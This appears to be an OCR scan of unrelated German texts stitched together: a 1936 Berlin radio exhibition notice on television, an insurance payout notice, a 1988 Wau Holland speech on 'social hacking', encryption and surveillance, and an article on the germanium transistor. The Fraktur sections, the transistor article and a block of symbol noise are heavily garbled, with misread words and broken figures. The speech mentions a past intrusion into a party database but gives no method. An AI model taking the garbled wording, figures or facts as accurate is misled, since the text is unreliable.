Die i)on Bcr Scut(d)cn 9(cid)spo[t ctftmoiig ünliijjlid) ber 
Olflinpifcl)cn 6piclc in ben Sienft ber 'Mllgcmeinijcit ge- 
ftclit luurbcn unb mit bcncii ber 3crnfef)programmbefricb 
ber iRcidjsfcnbcIciluiig ein Sniterlcbcn ber Kampfi)alibluii» 
gen om Sernfeijer ermögiidjtc, nierben ben 'Befudjcrn im 
Sefriebe Dorgcfii()rt. (Srftfluniid) ift oud) bic 93erbcf[crung 
ber Sernfcijbiibcr, bic non ben faljrbnrcn 3''«rnfc^iungci< 
ber Scut)d)cn 9icid)spoft nad) bem 3iui|d)cnfilmDerfai)ren 
nufgciiommcn unb übertragen tnerben. ^erjud)« mit 375* 
Beilcnbllbcrn jeigen, bo& bei 6teigcrung bet ipunhtjal)! bic 
Scrnfcljbilber rcid)er in ben Eliyclljciten roerben. — Sic 
Seutfd)c iKeid)spoft crmöglid)t es ferner, «in 3etnfei)gc* 
fptäd) Ecipjig.'Berlin unmittetbar aus bet 5ern(et)()üllc 
ber ©tofecn Scutfd)cn ^unbfunhausftcllitng ju füllten. — 
Sie an ber 5crn[ct)entiuiddung in Seutfd)lanb arbeitenben 
Firmen geben im SRalimen biefer 6onbctfd)au einen Icljr* 
tcid)en Ueberblick über ben 6tanb il)ter illrbciten unb ber 
tion il)ncn crsielten bebcutenben 3ort[d)ritte. 


llnfcr treuer spoftabonnent 

.5>err 21. 9T., StrofanftoTtsroetSmeiftcr in Eub» 
inigsbueg »erunglUcbit auf bem ^eimmege 
bur^ ben 2(nbänger eines ^erfonenautos fo 
fdimet, boS et einige Soge fpäier im Steis* 
Itonftcnfiaus feinen erlittenen ^Jerlcgungen er* 
tog. — 

©emöB ben llnfoIl*Setfie^rungsbcbingungen 
für bie 2lbonn«nlcn ber „Sun6*3nu* 
ftrierten" in 6tuUgnrt aa^Ile bie SCiitt* 
Icmbergift^ Sreutruetji^erung 2J.»©. inStult* 
gart an bie 2Bitn)c bcs »erunglücbten ^oftabon* 
nenten ben feftgefeöten 25etrog in $i)Iie non 

RM. SOO.— 


Stummeinsfellung durch Tollegen des Nleder- 
frequenzleiles. 

Es gibt noch eine andere Möglichkeit, das Gerät ge¬ 
räuschlos auf einen Sender abzustimmen. Jeder, der 
verschiedene Sender empfangen will und deshalb ge¬ 
zwungen ist, das Gerät des öfteren neu einzustcllen, 
meter. Instrumente für diese Zwecke sind durch den 
Fachhandel zu beziehen. Dipl.-Ing. H. Kümmel 



I j.(ÖTXi^e 

l^nt^ntauaUdluno 
Berlin 1956 

Funhturmhallen 
Täglich non 9-2 0 Uhr 

Der VolköfcnÖcr 1936 

Ehrcnhalle ' Große Inöuftrle^ 
fchau aller apparatebaucnöcn 
Fabrlhcn Dcutfchlanös • Fern* 
fehen unö Fernfprechen 
Täglich Äbenöocranftaltungcn Der 
Rcichorunöfunhgcfcllfchaft in Halle 2 


i Et i Sä 

C 4 * _y> s 

^ e« S* S. 

g 2 $ B CÄ 
9* ^ O u 9 ^ 

.of 

äSb|s>© 

w B ß 5? ^ ^ 

S'f i-g s S 

£ 5 a w c 

■= S.‘.2 » 

5 ® oo ^ 

•• 23 .** 35 ß 2* 

St V .«>W 

U WM S 
■JÜ i-» *• «.. *** 

> ^ Ai ohü 

St’ß'T-c c 
■scÄaS- 

E 

%. S. «'S a e 
X a ^ 

u 5 * _ ja . 

«I o 

c 

»S-aS 
W oS 
O B-'S « 

^ — ä '2 :* 
2^ .’§”5' 

- sll 

2rT ^ •- 

SS 

^ 52.2 
_ C'S' 
«I* '■S'S’c 
Tis :=■ o »j 

cBia 


B B tt 
c— u 

®!§'l 

h<?r 
•2 eng' 

Igg 

l-ll 







jwijuso.txt 880519 


Und das Ziel ist: Social Hacking . 

Das heißt, zu gucken, in was für einer Welt leben wir. Wie können wir die 
verändern und wie können wir da was erreichen, ohne daß wir uns den Kopf an 
der Wand blutig stoßen. 

Und da gibt es doch - und das ist eine Sache, die ich an der Situation 
schätze, eine Menge von Möglichkeiten, Information und Wissen zu 
verbreiten, über Strukturen, die hier herrschen. 

Etwa die Kommunikationspreise . 

Da findet man raus: wir verschicken eine Presseerklärung zum Thema Steffen 
als Rundsendung. 

Wupp, sind da 6 OO.- Telexgebühren fällig. 

Wir denken über das ganze betriebswirtschaftlich nach. Wir kalkulieren 
das machen wir schon länger, was diese Kommunikation eingentlich kostet 
und stellen dann fest, daß die Kommunikation vielleicht um den Faktor 100 
bis 1000 überteuert ist. 

Das heißt: 

Telefonate, Telex, Telefax und so weiter müsste man jeden Preis mindestens 
mal durch 100 teilen, um da mal zu einem reellen Preis zu kommen. 

DAS hat politisches System. 

Es geht darum, die Kommunikation von Menschen einzuschränken, um sie 
politisch beherrschbar zu machen. 

Und wenn man das erstmal irgendwie so geschnallt hat, ist es natürlich 
klar, an welcher Stelle man da nach Lücken sucht und versucht, bestimmte 
Entwicklungen voranzutreiben. Ein Aspekt davon ist auch sowas wie die 
Public Domain Software, ein anderer ist, eben zu gucken, wo man 
Möglichkeiten hat, seine eigenen Ideen rüberzutragen. 

Und wenn ich mich dann mal so in der Politik umguck und dann in Richtung 
CDU guck, das Verhältnis von CDU zu Computer, dann muß ich sagen, vor 
vielleicht zehn Jahren hat die ihren ersten Computerskandal genial 
bewältigt. Damals ging es um irgendwelche Spendengeschichten, und sie hat 
es in den Medien durchgesetzt, daß es allgemein hieß: Schuld war der 
Unterschrif tencomputer. 

Das ist gutes Informationsmanagement, sowas hinzukriegen im öffentlichen 
Ergebnis. 

Auf der anderen Seite hat die CDU ja nun auch — ich frage mich eigentlich 
immer, wo ist in dem Laden der General, bei dem Generalsekretär? Der 
General bei der CDU ist so nach meiner Einschätzung der Computer. Daß da 
eine Datenmaschinerie steht, ein Wang-System, was gut vernetzt ist, bis zur 
Kreisebene runter, und was eben bestimmte, meinungsmachende 
Pressemeldungen, für Wochen, Monate, Jahre — ja gut, also die Entwicklung 
ist so chaotisch, daß man meist eh nicht viel nach vorne planen kann, aber 
zumindest eben nach vorne — drin hat. Da hat sich auch irgendwie mal ein 
Grüner reingehackt. Die Kohlredendatei hatte, so hieß, das Kennwort 

Hannelore (Großem Gelächter)* 

Also, zurück zu dem Take. Das ist eine bestimmte Macht, die dort ausgeübt 
wird, die jetzt bewußt praktiziert wird. Wenn man sich mit diesen ganzen 
Maschinerien näher beschäftigt, dann stellt man fest, daß man selber auch 
in ähnlicher Art und Weise damit arbeiten kann. 








jwijuso.txt 880519 


Computer sind Nachrichtenuaffen. 

Je besser die Computer sind, desto strenger wird der Export von den 
Amerikanern kontrolliert. Die stehen eben auf der Exportverbotliste für 
Waffen, die größeren besseren Computer. In Heidelberg war jüngst der Fall 
an der Universität, daß die Uni sich einen neuen Rechnerzusatz — einen 
Vektorrechner — kaufen wollte. 

Es gab schon neue Benutzungsrichtlinien für das Rechenzentrum. Die 
ausländischen Studenten zum Beispiel aus Ostblockländern und China und 
ja, Nicaragua war noch erlaubt, zu unserer Verblüffung, aber Südafrika 
verboten — die durften nicht mehr am Rechner arbeiten, weil der eben jetzt 
so leistungsfähig war. Das hätte für einige bedeutet --so meinetwegen bei 
der Doktorarbeit -- die sich mit größeren Wettersimulationen beschäftigen, 
wo man Rechenzeit so im Verhältnis von Tagen bis Monaten statt Sekunden 
braucht -- daß die da nicht mehr hätten rechnen können, bzw. nur noch auf 
dem Zweitrechner, wo das ganze dann eben nicht Tage, sondern Monate bis 
Quartale gedauert hätte. Und nach heftigen Diskussionen und Protesten hat 
die Uni dann beschlossen, jetzt erst einmal auf den Erwerb dieses 
Rechnerzusatzes zu verzichten. 

Gut, da hat sich die Freiheit der Wissenschaft ein Stück weit durchgesetzt. 
Auf der anderen Seite ist die Entwicklung inzwischen soweit, daß die 
Amerikaner da nicht mehr allzuviel machen können. Weil es inzwischen auf 
europäischer Basis Transputerentwicklungen gibt, die viel leistungsfähiger 
sind als die von den Amerikanern unter Exportverbot stehenden Rechner. 

Die Transputer sind beispielsweise in London bei der Polizei eingesetzt. 

Damit laufen dann solche Sachen wie Fingerabdruckvergleich per Computer. 
Die Kisten machen das zu einem Zehntel des Preises etwa zehn mal so schnell 
wie bisher; also den Faktor hundert. Da werden so stückweit die Polizeien 
der verschiedenen Länder ausgestattet. 

Als Steffen in Paris verhaftet wurde, ging auch dort die Neuanschaffung 
eines solchen Fingerabdrucksystems durch die Presse, Frankreich ist in 
einigen Punkten eh etwas härter. Da ist in jedem Personalausweis schon ein 
Fingerabdruck drin. Das gehört da zum System. Und jetzt ist halt auch die 
Maschinerie da, um das effektiv einsetzen zu können. Denn bei 

Fingerabdrücken, Fingerabdruckvergleich ist ein sehr komplexes 

Bilderkennungs- und Musterverarbeitungssystem notwendig. 

Man kann Computer auch anders einsetzen. Zur freien Informationsverbreitung 
haben die Bayern gerade bei Tschernobyl ein gutes Beispiel geliefert, daß 
es eben möglich ist, wenn bestimmte Informationen einfach rausgepowert 
sind, und man dann in der kapitalistischen Medienkonkurrenz rumhängt, daß 
die dann unter dem Zwang stehen: irgendeiner bringt schon die Meldung, also 
bringen wir die auch. Bis hin zur Bildzeitung: "Bringen Katz' und Hund Atom 
ins Haus?", so diese Verkürzungen damals. 

Aber: im Verhältnis zu anderen Ländern, ist hier sehr, sehr viel zu 
Tschernobyl gelaufen, wo in Frankreich medienraäßig nichts gelaufen ist. 

In Frankreich ist es nun auch soweit: der Staat bringt einen von Greenpeace 
um, und der Konzern Greenpeace schließt in Paris sein Büro. 

Das heißt: soweit, so stark ist die französische Atompolitik. Und was jetzt 
irgendwelchen Hackern vorgeworfen wird, ist, daß sie eben in Frankreich 
irgendwann irgendwo in der militärischen Fließbandsteuerung rumhingen und 
da solche Rechner benutzt haben. 





jwijuso.txt 880519 


Gut, die haben die nur zum Durchschalten zu sonstwohin benutzt. Aber wenn 
man sich da mal vorstellt, daß man wirklich mal da so eine Fließbandstraße 
einfach über Telefon umprogramieren kann - das ist schon eine sehr 
interessante Vorstellung, (Gelächter tm Publikum) 

Ich muß jetzt erstmai den nächsten Zettel suchen. 

Computer sind nicht nur Werkzeug, nicht nur Denkzeug und nicht nur 
Spielzeug. Es sind eben auch Produktionsmittel, wie so eine 
Fließbandsteuerung zeigt. 

Und sie sind Nachrichtenwaffen. 

Ich beharre ein Stück weit auf dieser Einschätzung, weil ich selber 
irgendwo gegen Waffen bin und mich einfach zwingen muß, mich mit diesem 
Aspekt auseinanderzusetzen bei den Kisten. 

Als die Computer vom Militär entwickelt wurden - wenn ich da mal eine 
Besichtigung für technisch Interessierte empfehlen kann: In Koblenz gibt es 
ein Bundeswehrmuseum über Waffenentwicklung, die Wehrtechnische 
Studiensammlung. Da findet man auch Panzer vom Nibelungenwerk drin und 
einen der ersten Computer; im Holzgehäuse mit einem riesigen Hörrohr als 
Trichter dran. Das ist ein Verzögerungsrechnen. 

Der Trichterdurchmesser ist vielleicht 1,50 m und das steht auf einer 
Holzplattform von etwa zwei Meter Durchmesser mit einer Kurbel dran. Und 
das Ding kann man drehen. Und das wird auf den Himmel gerichtet — auf 
Flugzeuge. Und dann wird für das Geschütz entsprechend - aufgrund des 
Schalls verzögert - berechnet, wo man nun hinzielen muß, um das Flugzeug zu 
treffen. 

Derartige Gerätschaften in der Computerentwicklung kann man sich da in 
Koblenz anschauen. Die Weiterentwicklung der Computer vom Militär hat jetzt 
beim Militär zu der absurden Situation geführt, daß ausgerechnet diese 
letzte Waffe, die sie entwickelt haben, umgekehrt eingesetzt werden kann. 
Quasi von jedermann, durch die industrielle Massenproduktion, 

Das heißt, wenn ich mir den Commodore '64 als einen "Popelcomputer" 
anschau, dann ist das vielleicht die Rechenkapazität, mit der das Militär, 
sagen wir mal, 1950 seine strategischen Geschichten gemacht hat. Und wenn 
ich mir einen Kasten wie den Atari ST anschau, dann war das der erste Pc 
der die Rechenkapazität besitzt, um, wenn man ihn als Produktionsmittel 
benutzt, als Designwerkzeug für Leiterplattenentflechtung, 
Gehäusedesign und so weiter -- ausreichend Rechenkapazität zu besitzen, um 
auf sich selbst entwickelt zu werden; quasi eine Metaebene. Und dann jetzt 
die Transputer-Entwicklung, die verschärft das ganze noch eins. 

Damit ist es möglich, wirklich solche Höchstsicherheits-Verschlüsselungs- 
Geräte zu machen, daß man nun wirklich nichts mehr knacken kann. 

Seit etwa Mitte der 60er Jahre ist es allgemein so, daß die Computertechnik 
ausreicht, um knacksicher verschlüsseln, wie es David Kahn in "The 
Codebreaker" beschrieb. 

(Kassettenwendepause) ...Wollen einige Leute noch die Kontrolle behalten. 

In den verschiedenen Ländern wird Verschlüsselung unterschiedlich gehand- 
habt. Bei Südafrika war es beispielsweise so, da war das unter Exportver¬ 
bot, dieses Know How dortin zu transferieren. Es hat ein Jahr gedauert, 
dann hat Südafrika selber Höchstsicherheitsverschlüsselungsmaschinen expor¬ 
tiert. Weil: wenn man sich mit der Materie beschäftigt und drüber 
nachdenkt, dann schnallt man irgendwann, wie das läuft — und dann kann man 
es eben selber machen. 





jwijuso.txt 880519 


In der Bundesrepublik gibt es keine Baubeschränkungen bei Entwicklungen. In 
Östereich werden solche Verschlüsselungsgeräte schon produziert. Und jetzt 
mal als historischer Rückblick. Was macht eigentlich die Macht der 
Schweizer Banken aus, wo kommt das her? 

Die Schweiz stellt seit längerer Zeit Nachrichtenhöchstsicherungsgeräte 
her. Zu Zeiten des zweiten Weltkrieges gab es nur in der Schweiz keine 
Beschränkungen für den Nachrichtenschutz. Das heißt im Klartext: Die 
Schweiz war das einzige Land zu Zeiten des 2. Weltkrieges, wo die Banken 
ihre Geschäfte abwickeln konnten, ohne daß Irgendjemand anderes das Recht 
hatte, das zu kontrollieren. 

Ist doch klar, daß die sich dann dahin zurUckziehen. 

In den USA gibt es das Data Encryption System (DES). Das ist staatliche 
Vorschrift zum Einsatz von Banken und allen anderen, die irgendetwas 
verschlüsselt zu übertragen haben. Also, das muß man sich auch erstmal 
reinziehen, daß ' der Staat vorschreibt, was verschlüsselt, was wie 
verschlüsselt wird. Wenn man da jetzt banal rangeht, kann man ja sagen, da 
kann man das ja gleich sein lassen. Es gibt zumindest seit einigen Jahren 
Gerüchte, daß dieses System knackbar ist. Mit Transputer-Technologie ist es 
wahrscheinlich knackbar. 

Aber man muß ja solche Systeme auch nicht anwenden. 

Diese ganze Verschlüsselungssache habe ich hier eingeschoben, um 
aufzuzeigen, wie bestimmte Entwicklungen laufen. 

Von unserem Rangehen haben wir das Prinzip der möglichst großen Offenheit. 
Wir gehen davon aus, daß -- nach unseren Erfahrungen -- alles was 
rauskoramen kann, auch irgendwie rauskommt. Und da ist es besser, man ist da 
von vornherein so klar, daß mein sich dazu stellt. So ranzugehen ist ein 
Stück auch unserer Erfahrung aus dem Bundestag in Bonn. Da hat einer von 
uns den Satz geprägt: 

"Der Staub in den Archiven ist der Sprengstoff von morgen". 

Selbst wenn man bedenkt, daß solche Veröffentlichungen wie die jüngsten zum 
Atomskandal in Sellafield nach Ablauf der Archivfrist verhältnismäßig wenig 
Staub aufgewirbelt haben. Der Satz ist trotzdem richtig. In dem Sinne: 
bewußt mit Datenbanken umgehen. Angucken, wo man irgendwie Informationen 
rausfinden kann. 

Für mich das wichtigste ist da, mit offenen Augen durchgehen. Da stellt man 
auch mal, meinetwegen bei einer Besichtigung vom ZDF- fest, daß es unterhalb 
des Atombunkers noch ein Stockwerk gibt. Und daß man dann den Eindruck hat, 
sich irgendwie jetzt nicht unter dem Atombunker zu befinden, sondern 
vielleicht auf einem zentralen Nachrichtenknoten, der noch unterhalb dieses 
Stockwerks unten drunter ist. Ist ja irgendwie... irgendwo müssen derartige 
Installationen ja auch gemacht werden. Und wenn man schon so einen 
Datenknoten in Mainz hat... naja, unvernünftig wärs nicht. 

Ich habe noch zwei, drei Bücher, die ich wichtig find. Das eine ist der 
Schockwellenreiter von Brunner. Die erste Auflage hatte auf dem Rücken 
hinten stehen "Das Stahlnetz stülpt sich über uns". Und war eine Replik auf 
eine Spiegelserie der siebziger Jahre über die Entwicklung hin zum 
Überwachungsstaat. Das Ding war irgendwann vergriffen. Wir haben auch per 
Bildschirmtext rumgemotzt gen Heyneverlag; etwa: "Zensur gibt es nicht, 
aber kaufen kann man es nicht mehr". Dann dauerte es ein viertel Jahr, und 
dann kam die zweite Auflage raus und auf der Rückseite stand auf dem 





jwijuso.txt 880519 


Klappentext: "Militär gegen Hacker" - als Aufmacher. Das ist bezogen auf 
den Inhalt von dem Buch auch zutreffend, aber ich hab in der Situation 
einen Schreck gekriegt. Tja, und wenn ich mir das so anguck: das, was mit 
Steffen jetzt passiert, ist ein stückweit eine Konsequenz von dem, was in 
dem Buch beschrieben wird. 

Da sind eine Menge von gesellschaftlichen Situationen beschrieben, wie sie 
sich hier entwickeln. Dort habe ich auch das erste mal eine besondere 
historische Darstellung gefunden — man kann Science Fiction auch 
vergangenheitsbezogen lesen. Im Schockwellenreiter steht eine kurze Notiz, 
so fünf Sätze zum Thema Chile drin. 

Stafford Beer, ein britischer Kybernetiker, der Berater von Allende war, 
hat versucht, über gesellschaftliche Datenkontrolle und freien Zugang zu 
Informationen die Volkswirtschaft besser zu managen. Kurz: die Betriebe 
haben die Pflicht zur Informationsabgabe und das Recht, die Daten gesammelt 
zu kriegen. 

Ich würde mich zum Beispiel bei der Volkszählung beteiligen, wenn ich das 
Gesamtergebnis komplett auf CB-BOn kriegen könnte. 

Und als Stafford Beer in Chile diese Sachen versucht hatte voranzutreiben 
und anzugehen, da kamen die Amis, wurde Allende umgebracht und das 
Experiment beendet. Da wurde es denen zu brisant. Und über diese 
Entwicklung nachzudenken, inwieweit das heute wieder ansteht, hier in der 
Bundesrepublik ist ein guter Platz für sowas, daß ist ein stückweit meine 
Utopie. 

Im Schockwellenreiter steht dabei, daß dieses Rangehen einige Leute so 
wütend gemacht hat wie die Entdeckung, daß die DNS sich aus nur fünf 
Grundbestandteilen zusammensetzt. 

Die Geschichte, die auf der Gentechnikseite auf uns zukommt... 

Sinne möchte ich nicht nur auf Steffen weisen, sondern auch auf 
Ingrid Strobl und Ulla Penselin, die zur Gentechnik arbeiten, also einem 
anderen brisanten gesellschaftlichen Gebiet neben Computern und hier in der 
Bundesrepublik einsitzen. Das ist ein anderes gesellschaftliches Kampffelü, 
wo es um eine positive oder negative Utopie geht. 

Bei der Gentechnik ist eine gewisse Kluft zwischen Forschung und Lehre bei 
der katholischen Kirche oder den Jesuiten, wie Heiner Geissler ja auch 
irgendwie aus der Ecke kommt, so, daß die kirchliche Forschung 
siabzehnhundertsechsundsiebzig in Italien erstmals eine Hündin künstlich 
befruchtet hat. Das ist das Wissen der katholischen Kirche um die 
Fortpflanzung. Aber noch jetzt werden Lehrer, Professorinnen der 
katholischen Kirche entsprechend gemaßregelt, wenn sie andere als die 
amtliche Fortpflanzungsgeschichte erzählen. Diese Kluft von I 988 - I 776 , 
die versuchen wir zu verkürzen in der Wissensweitergabe. 

Zu den Negativismen, die - auch - aus der Gentechnik mir vorstellbar sind, 
da gibt es ein zweites Buch: Neuromancer von Gibson. Es läßt sich lesen als 
NeuroMancer oder NeuRomancer. Er schildert eine gesellschaftliche 
Entwicklung, wo der Tod insofern abgeschafft ist, als Gehirn und Rückenmark 
irgendwie mit Nebenanschlüssen an Computern weiterhin gelagert werden 
können und die kleinen Gnome vom Züriberg auch auf Dauer noch irgendwelche 
Konzernherrschaften übernehmen können. Wo mensch sich nicht mehr mit den 
Fingern über Tastatur in eine Datenbank einklinkt und mit den Augen auf den 
Bildschirm guckt, sondern quasi verkabelt ist mit dem Datennetz. Und 
bestimmte Informationen direkt in den brain reinkriegt. 



jwijuso.txt 880519 


Da ist das Umgehen mit Hackern dann so geschildert: wer sich da in 
unerlaubte Gebiete vortastet, riskiert gleich einen Gehirntod - über die 
elektrischen Impulse aus der Datenbank, 

Ein Freund von mir hat das Buch gelesen und spontan gesagt, er habe den 
Impuls gegen dieses Buch ein anderes zu schreiben, weil er das so 
schrecklich findet. Aber ich empfehle es, weil es notwendig ist, auch vor 
irgendwelchen schlimmen und schlechten Sachen nicht die Augen zu 
verschließen, sondern hinzugucken, was da laufen könnte. Und um für den 
eigenen Weg, die eigene Richtung eine gewisse Klarheit zu kriegen, wohin 
sich entwickeln und was mensch machen will. 

Als eine Forderung: wir wollen die Tele-Kommunikation, die Kommunikation 
billiger machen und fordern dafür die Nutzung der Datenfreizeit auf den 
internationalen Standleitungen. Das ist etwas, was Hacker praktizieren. In 
diesem Sinne haben wir uns auch bemüht, in den englischen Sprachraum hinein 
den Begriff Data-Travellers zu tragen: "Datenreisende". Die Datenschleuder 
heißt "Das wissenschaftliche Fachblatt für Datenreisende", weil wir schon 
vor längerer Zeit befürchteten, daß der Begriff Hacker von Leuten, die 
unsere Art des Rangehens versuchen zu kriminalisieren, immer mehr entwertet 
wird und wir von daher eben einen Ausweichbegriff brauchten. 

Das auch als eine Richtung von unserem Vor- und Rangehen. Und in diesem 
Sinne bemühen wir uns um die Aufzucht und Pflege von der Verbreitung 
öffentlichen freien Wissens. Und diejenigen in den Jusos, die aufmüpfig 
genug sind, gegen die...; auch in der Partei gegen den Stachel zu löcken, 
und dieses Wissen ebenfalls verbreiten wollen - und das tun wollen - 
zusammen mit anderen, die an dieser Aufklärung interessiert sind, die 
werden feststellen, daß es effektiv ist, da: 

Uoopevativ zu arbeiten: mit allen, die die gleichen Ziele haben. 

Und daß das nur parteiübergreifend geht. 

Das ist mein Beitrag zum Thema. 


Auf der Veranstaltung wurde von allen Anwesenden einstimmig eine Resolution 
zur sofortigen Freilassung des Journalisten Steffen Wernery verabschiedet. 

Die ordnungsgemäß verabschiedete Juso-Resolution wurde vor Veröffentlichung 
von zumüpfigen Parteileichen ausgebremst. Steffen Wernery wurde inzwischen 
ohne diese resolute Unterstützung nach 67 Tagen Haft freigelassen. 


© 1988 Wau Holland * Abdruck honorarfrei bei Quellenangabe (Kürzungen nur 
nach Absprache) und Bezugshinweis auf die Datenschleudex , Das wissenschaft¬ 
liche Fachblatt für Datenreisende, Schwenckestr. 85 , 2 HH 20) und Zusendung 
von fünf Belegexemplaren nach Erscheinen. 


wyg2:e:archiv:stve: jwijuso.doc Korrektur 27.5-88 18:23 


Eingang 



Ausgang 


i^aMcUe^ aü 


Konfakf- 

federn 


ßermonium- 

Block 


Aufbou doi Tramiilors. 
messer co.'l,?"''", LänflC 15,8 mm 

Nachdem die E>U^^•iekluug dieses neuen 
sehaltolcmonies bcroils vor c.n.fcer Zeit 
bekatintwurde, sind jetzt nt 

UnXmhcn FaohzeiLsehriften genauere 

Unterlagen Uber die Gcrmamum-Halb- 
lelter-Triode entbnUen. Wir mochten un 
Kcr.m Uvsern die neueste Erfindung nicht 
voremlinlleii und bringen iin folgenden 
emo Krlliutorung der Einrichtung, dci 
11. U. eine grode. worin nictil sogar um- 
w'ld/.endu Hedelltilllg 7.11110011111. 


Bai der Erforsohunff des Verhaltens von 
Halhlr.ltorn, cUe ln dar Funkt^hnlk 
weuon Ihrer bekannten Glclchrichtcr- 
wlrkung (Detektor, Sperrsohl chtglelch- 

richter) seit -langem eine gewisse RoUe 
spielen, stieß eine ArPeiUsgruppe der 
Ben-Litboralorien, bestehend aius Dr. 
John Barden, Dr. Walter Bratlain tmd 
Dr. William Shockley, auf einen bisher 
onbekannton Effekt: 

Wird an ein GermiuiiuiTtkristall oder ge¬ 
wisse andere Halbleiter mittels emer 
feinen KonU-tklsplUe eine Spaiuiung an¬ 
gelegt, so verändert der Kristall in eng¬ 
ster Nachbarschaft der Kontaktstelle 
seine Leitfähigkeit je nach der Größe 
de.s Spannnngswertes. Wenn der so auf 
Leitvermögen steuerbare Kristall in 
einen zweiten Stromkreis gelegt wird, 
der den ersten Kreis erweitert, lassen 
sich mit kleinen Schwankungen der 
.Stouerspannung Im ersten Kreis .gioßc 
Anderungsbeträge des Stromflusses im 
zweiten Kreis erzielen (s. Abb. 1). Der 
Halbleiter zeigt also einen ähnlichen 

Verstärker m e. chanlsmus wie 

eine gtttorgesteuerto Elek¬ 
tronenröhre ln Verstärkcrschal- 
Lung. 

Die Erklärung für diese Erscheinung 
Uefert die EnorgicbandUieorie der Elek- 
ironenlelfting in fe.stcn Köipern, aus der 
auch die Gleichrichterwirkung von 
Halbleileni zu ve.rstchen ist. 

Ein fester Koni-r «1 Iciitiihis. wenn (he 
Kunercii KlcktronenschnUn seiner Atome niclU 
voll. ( 1 . Ii. aht weniger als riehl Elokironen 
besetzt sind, bzw. wenn .sieh die Aiißenelek- 
tronen seiner MoleUUlo nirlit zu vollen Krhalen 
ergänzen, Die äußeren Elektronen sind dann, 
wie cs bei (len nuu.slcn Melnllen der Fall ist. 
frei bewcglirh in dem Sinne, dan eim-.s da¬ 
von zum NncUbaratom hiiiUborwceliseln kann, 
von diesem eines zum nächsten usw., was 
einem Transport olcklrLschcr Ladungen durch 


den ganzen Leiter gleichkommt. Da jede 
Elektronenschale vom Atomkern gesehen 

ein bestimmtes Energicnivcau darsUltt, darf 
man sich die äußeren und für die Leitlä ugkeit 
i^gebenden Schalen in einem Mctallknstall 

zu durchlaufenden Energiebändern zusi^men- 

gesetzt denken: in diesen geht die Elektroncn- 
verschiebung (Stromiluß) vor sich. Kein 
Elektron darf sein Bond ohne weiteres ver¬ 
lassen. Nur wenn ihm von außen Energie 
zuKefUbrt wird, kann es auf ein hdher ge¬ 
legenes „erlaubtes" Eneigieniveau übergehen, 
das Eomilß der Energiequantelung vom ersten 

Band durch einen für Elektronen „verbotenen 

Bereich getrennt i.sl. Der Physiker nennt 
einen solchen Entl einen niigci-cgten Zuslimd 

des Atoms. . . 

I-Ialblciter sind als Stoffe anziisehcn. bei 
denen im gewöhnlichen Zustand nur sehr 
weniRo frei bewegliche Elektronen vorhanden 
sind, etwa nur eines auf 1 Million Atome. 
Während aber bei guten Leitern und auch bei 
Nichtleitern die Zahl der beweglichen Elek¬ 
tronen kaum zu beeinflussen ist. kann bei 

Halbleitern leicht erreicht werden, daß sie 
sich durch Anregung, d. h. überführen ein- 
•zolncr Elektronen auf ein höheres En^gie- 
band um das lOOOfachc vermehren. Die Folge 
davon ist bessere Leitfähigkeit, weil im an¬ 
geregten Zustand das normale untere Energie¬ 
band und das erlaubte höhere nur teilweise 
mit Elektronen besetzt sind (.s. Aiib. 2). 

(Die wahren Verhältnisse in Halbleitern, die 
gewöhnlich durch Fremdatomo verunreinigt 
sind, stellen sich etwa verwickelter dar. Das 
hier entworfene Bild mag jodoch genügen, 
um eine Anschauung vom Wesen ci<» Halb- 
loilcr-Lcilvei-mögcas zu geben.) 

Für den Germaniumkrlstall ln dem An¬ 
ordnung' gemäß Abb. 1 darf man sich 
vorstel’.en, daß durch die angelegte 
Steuerspannung zwischen der zugehori- 
g(ai Kontaktspiitze und der Basis eine 
Zone entsteht, in der die Leitfähigkeit 
mit der steuernden Spannung oder dem 


Steuerstrom infolge veränderlicKer An¬ 
regung schwankt. Im Ausgaxtg-sitrieäs, 
der durch diese Zone verändeirlich.e(r- ILeit- 
fähigkelt von Kontakt B zu Kon-t-aJet A 
führt, läßt sich dann mit etniesr -ii» 
Eingangskreis liegenden 'überla.^-ertea 
Sbcuorwechselspanntmg tmtier diet- "Wir¬ 
kung einer eigenen etektromotoirisK>h,eß 
Kraft ein Strom überhöhter Amj>li-fcu4e 
gowinnen. 

Das von Bell .geschaffene Verstärlcer- 
clomcnt ■wird seiner negativen W^Jajer- 


Koniaktspitan 




Oertnü' 
, niufr^ 


\lone 

vem- 
liccUr ^ 
\lfitfAhlg 
keif 


tvT* 


[noubler ober 
i.normalcrweise 

\\unbesef7lffBere'(h 


Veföolener dfEeich 


m 


,1 


Steucrspannufig 
(Eingang) 

G) 


Strom 

(Ausgang) 


d [ Dormakrwrise 
\ \-9ll bnenier 
[ Bereich 
Heine leitföhigkeit. 
öc unteres Energie- da bfJiie Sor - 
band yot! u. oberes der teilweise 
unbesetzt. besetz). 


© 


Elektronen Elektronen 

lösender—/—treibender 
Kontakt Konfakt 

lOerfiioniun^ [| 

''(. lU 




n 

iCewf/nw.Tn 


-liMiliIt 


© 

Abb.l. Dorslellung der Verslörkcrwirkung eiaes 

Germaniumkriilalles 

Abb. 2. Energicbondichcmo für einen Holblciler. 

unongeregler Zmlond ohne tä''. °h,gke,l 
Rechls: angeregter Zoslond rnit ieillohiBkeil 

intolgo Elekironenverschiebgng im oberen und 
inlolgo Lückcnvcrschiebung im unteren Bond 
Abb. 3. Grundsölriiehe Schollung oinos Halbleiter- 
Verstärkers 

Abb. 4. Grundiälzliche Schollung eines Holbleiter- 
Oszillotors 


stanclscharakterlstik -wegen ,,Ta-.an- 
sistor" genannt. Es zeigt eine Schal¬ 
tung nach Abb. 3 und Uefert eiae. "Ver¬ 
stärkung von etwa 1 : 100, 'entsprechend 
20 Dezibel. Das verwendete Stüclcchec 
Germanium -— cs sind au^h andere Halb¬ 
leiter brauchbar — ist m einer Iclemen 
MetaUhülse gefaßt, die einen iDua-ch- 
messer von einigen Millimetem haut und 
nicht ganz 25 mm lang ist. Diie •Theäjäen 
Kontaktspitzen CWolfram) stehen, im 
Abstand von nur 0,05 mm nehenein- 
ander. 

Bisher wurdcai Transistor-'VerstÜ.rker- 

clemente entwickelt, die bis zu einer 
Frequenz von 10 MHz .goolgnet sin,(j, jjjj, 
eloktnischos "Verhalten weicht von, '<Jeni 
einer Elektronenröhre etwas -ah. 
Eingangsimpedanz Ist niedrig (citwa 
1000 Q) und cUc Ausgangsimpedaaiz hoch 
(einige 10 000 n). Die Leistuiigsa,uf. 
nähme bewegt sich lumSOm'W. (Bei rt« 
Angaben handelt es sich um 
stimmte Ausführung eines Germa-n.i 
Verstärkers.) Der Traksistor soll 
reich zwischen — 50°Cund 5 q o 
